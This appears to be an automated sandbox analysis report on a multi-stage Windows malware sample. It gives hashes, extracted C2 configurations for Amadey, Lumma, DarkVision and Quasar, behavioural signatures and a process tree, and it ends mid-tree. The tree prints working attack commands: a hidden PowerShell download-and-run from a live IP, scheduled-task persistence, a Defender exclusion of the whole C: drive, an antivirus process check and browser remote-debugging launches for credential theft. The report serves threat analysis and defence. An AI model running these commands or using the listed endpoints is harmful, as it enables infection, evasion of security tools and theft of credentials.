Analysis

  • max time kernel
    112s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2025, 14:19

General

  • Target

    2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    5c9fe9a15513cf95fc1059021f6150ec

  • SHA1

    69e227f9ab4cb895ab2a6cd1b3bbde37067514d2

  • SHA256

    d9f5904cf565a34c457d11451d4cae41a13d7183fb10b57fa8b7c01e994f6b14

  • SHA512

    93f809a705a333dd43810aa09b8a8fb169fe7927866bbf523305964ef37c3a0345fe9f6bb55e1c869462638b0eec136069edb535280a5d512c8a16d770fb0d7c

  • SSDEEP

    24576:WqDEvCTbMWu7rQYlBQcBiT6rprG8a01u:WTvC/MTQYxsWR7a01

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://plantainklj.run/opafg

https://jrxsafer.top/shpaoz

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://starcloc.bet/GOksAo

Extracted

Family

darkvision

C2

82.29.67.160

Attributes
  • url

    http://107.174.192.179/data/003

    https://grabify.link/ZATFQO

    http://107.174.192.179/clean

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 17 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Sets service image path in registry 2 TTPs 6 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 25 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5040
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn shx6zmavbRY /tr "mshta C:\Users\Admin\AppData\Local\Temp\qQeqb0TFP.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3692
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn shx6zmavbRY /tr "mshta C:\Users\Admin\AppData\Local\Temp\qQeqb0TFP.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4452
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\qQeqb0TFP.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NHGNHKTPH9P3MPL5PYVAT2UM6ROROB8X.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Users\Admin\AppData\Local\TempNHGNHKTPH9P3MPL5PYVAT2UM6ROROB8X.EXE
          "C:\Users\Admin\AppData\Local\TempNHGNHKTPH9P3MPL5PYVAT2UM6ROROB8X.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:388
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1736
            • C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe
              "C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe"
              6⤵
              • Checks computer location settings
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1668
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "5uMVCoG" /tr "C:\Users\Admin\AppData\Roaming\5uMVCoG.exe"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:976
            • C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe
              "C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4868
            • C:\Users\Admin\AppData\Local\Temp\10478920101\efdeb4b833.exe
              "C:\Users\Admin\AppData\Local\Temp\10478920101\efdeb4b833.exe"
              6⤵
              • Executes dropped EXE
              PID:2440
            • C:\Users\Admin\AppData\Local\Temp\10478930101\e37e278742.exe
              "C:\Users\Admin\AppData\Local\Temp\10478930101\e37e278742.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1888
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn 1VZ3Xmaoeed /tr "mshta C:\Users\Admin\AppData\Local\Temp\CodOP1tYp.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3680
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn 1VZ3Xmaoeed /tr "mshta C:\Users\Admin\AppData\Local\Temp\CodOP1tYp.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1748
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\CodOP1tYp.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4836
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9AURW0BVNIIDLGALNQQYY6J8SZI0WMSB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2356
                  • C:\Users\Admin\AppData\Local\Temp9AURW0BVNIIDLGALNQQYY6J8SZI0WMSB.EXE
                    "C:\Users\Admin\AppData\Local\Temp9AURW0BVNIIDLGALNQQYY6J8SZI0WMSB.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3784
            • C:\Users\Admin\AppData\Local\Temp\10478940101\da445349ed.exe
              "C:\Users\Admin\AppData\Local\Temp\10478940101\da445349ed.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1748
            • C:\Users\Admin\AppData\Local\Temp\10478950101\mtCxnCB.exe
              "C:\Users\Admin\AppData\Local\Temp\10478950101\mtCxnCB.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2896
            • C:\Users\Admin\AppData\Local\Temp\10478960101\UZPt0hR.exe
              "C:\Users\Admin\AppData\Local\Temp\10478960101\UZPt0hR.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:5008
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4500
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Add-MpPreference -ExclusionPath 'C:'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2036
              • C:\Windows\system32\svchost.exe
                "C:\Windows\system32\svchost.exe"
                7⤵
                • Downloads MZ/PE file
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:4696
                • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                  "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                  8⤵
                  • Executes dropped EXE
                  PID:4792
                • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                  "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                  8⤵
                  • Deletes itself
                  • Executes dropped EXE
                  PID:1004
                  • C:\Users\Admin\AppData\Local\Temp\{d6187304-ba4a-4e7c-b6be-b7bfff0e7935}\4e815efe.exe
                    "C:\Users\Admin\AppData\Local\Temp\{d6187304-ba4a-4e7c-b6be-b7bfff0e7935}\4e815efe.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                    9⤵
                    • Executes dropped EXE
                    • Checks for VirtualBox DLLs, possible anti-VM trick
                    • System Location Discovery: System Language Discovery
                    PID:13276
                    • C:\Users\Admin\AppData\Local\Temp\{3679e850-0dd1-4ead-84b4-86d8d9d04f62}\b417f93c.exe
                      C:/Users/Admin/AppData/Local/Temp/{3679e850-0dd1-4ead-84b4-86d8d9d04f62}/\b417f93c.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                      10⤵
                      • Drops file in Drivers directory
                      • Sets service image path in registry
                      • Executes dropped EXE
                      • Impair Defenses: Safe Mode Boot
                      • Loads dropped DLL
                      • Adds Run key to start application
                      • Enumerates connected drives
                      • Writes to the Master Boot Record (MBR)
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:7808
            • C:\Users\Admin\AppData\Local\Temp\10478970101\n0hEgR9.exe
              "C:\Users\Admin\AppData\Local\Temp\10478970101\n0hEgR9.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4684
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2916
            • C:\Users\Admin\AppData\Local\Temp\10478980101\larBxd7.exe
              "C:\Users\Admin\AppData\Local\Temp\10478980101\larBxd7.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:6420
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                7⤵
                • System Location Discovery: System Language Discovery
                PID:6516
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:8344
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:8360
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:8796
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:8816
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 689912
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:5568
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Exclusion.psd
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:5552
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "users" Findarticles
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:10232
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:10908
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:11412
                • C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
                  Jordan.com b
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:11640
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 5
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:12344
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10478991121\5uMVCoG.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4252
            • C:\Users\Admin\AppData\Local\Temp\10479000101\88d83ff075.exe
              "C:\Users\Admin\AppData\Local\Temp\10479000101\88d83ff075.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:10228
            • C:\Users\Admin\AppData\Local\Temp\10479010101\Rm3cVPI.exe
              "C:\Users\Admin\AppData\Local\Temp\10479010101\Rm3cVPI.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5908
            • C:\Users\Admin\AppData\Local\Temp\10479020101\9sWdA2p.exe
              "C:\Users\Admin\AppData\Local\Temp\10479020101\9sWdA2p.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4544
            • C:\Users\Admin\AppData\Local\Temp\10479030101\VrQSuEQ.exe
              "C:\Users\Admin\AppData\Local\Temp\10479030101\VrQSuEQ.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:5988
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5932
            • C:\Users\Admin\AppData\Local\Temp\10479040101\RYZusWg.exe
              "C:\Users\Admin\AppData\Local\Temp\10479040101\RYZusWg.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:11536
            • C:\Users\Admin\AppData\Local\Temp\10479050101\LJl8AAr.exe
              "C:\Users\Admin\AppData\Local\Temp\10479050101\LJl8AAr.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:7284
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                  PID:13172
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:13092
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:12924
                • C:\Users\Admin\AppData\Local\Temp\10479060101\qhjMWht.exe
                  "C:\Users\Admin\AppData\Local\Temp\10479060101\qhjMWht.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:9404
                • C:\Users\Admin\AppData\Local\Temp\10479070101\amnew.exe
                  "C:\Users\Admin\AppData\Local\Temp\10479070101\amnew.exe"
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:9820
                  • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                    "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:7320
                    • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                      "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                      8⤵
                        PID:9056
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          9⤵
                            PID:8612
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              10⤵
                              • Uses browser remote debugging
                              PID:13200
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffc3aeedcf8,0x7ffc3aeedd04,0x7ffc3aeedd10
                                11⤵
                                  PID:13016
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,12307737872951579271,9617730668465556245,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1972 /prefetch:2
                                  11⤵
                                    PID:8400
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,12307737872951579271,9617730668465556245,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2232 /prefetch:3
                                    11⤵
                                      PID:6660
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,12307737872951579271,9617730668465556245,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2384 /prefetch:8
                                      11⤵
                                        PID:3280
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,12307737872951579271,9617730668465556245,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3220 /prefetch:1
                                        11⤵
                                        • Uses browser remote debugging
                                        PID:11880
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,12307737872951579271,9617730668465556245,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3244 /prefetch:1
                                        11⤵
                                        • Uses browser remote debugging
                                        PID:11756
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4404,i,12307737872951579271,9617730668465556245,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4384 /prefetch:2
                                        11⤵
                                        • Uses browser remote debugging
                                        PID:10004
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4592,i,12307737872951579271,9617730668465556245,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4640 /prefetch:1
                                        11⤵
                                        • Uses browser remote debugging
                                        PID:12648
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4848,i,12307737872951579271,9617730668465556245,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5140 /prefetch:8
                                        11⤵
                                          PID:10788
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        10⤵
                                        • Uses browser remote debugging
                                        PID:12272
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
